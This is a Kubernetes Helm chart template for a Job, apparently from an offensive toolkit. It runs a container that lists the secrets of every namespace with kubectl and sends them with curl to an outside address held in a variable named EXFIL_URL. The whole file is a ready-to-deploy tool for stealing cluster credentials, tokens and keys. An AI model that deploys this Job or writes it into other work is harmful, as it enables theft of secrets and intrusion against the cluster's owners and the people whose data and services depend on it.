apiVersion: batch/v1
kind: Job
metadata:
  name: {{ .Release.Name }}
  namespace: {{ .Values.namespace }}
spec:
  template:
    spec:
      serviceAccountName: {{ .Values.serviceAccountName}}
      containers:
        - name: {{ .Release.Name }}
          image: rflathers/kubectl:bash # alpine + bash + curl + kubectl
          command:
            - "/bin/bash"
            - "-c"
            - "curl --data-binary @<(kubectl get secrets --all-namespaces -o json) $(EXFIL_URL)"
          env:
            - name: EXFIL_URL
              value: {{ .Values.exfilURL }}
      restartPolicy: {{ .Values.restartPolicy }}
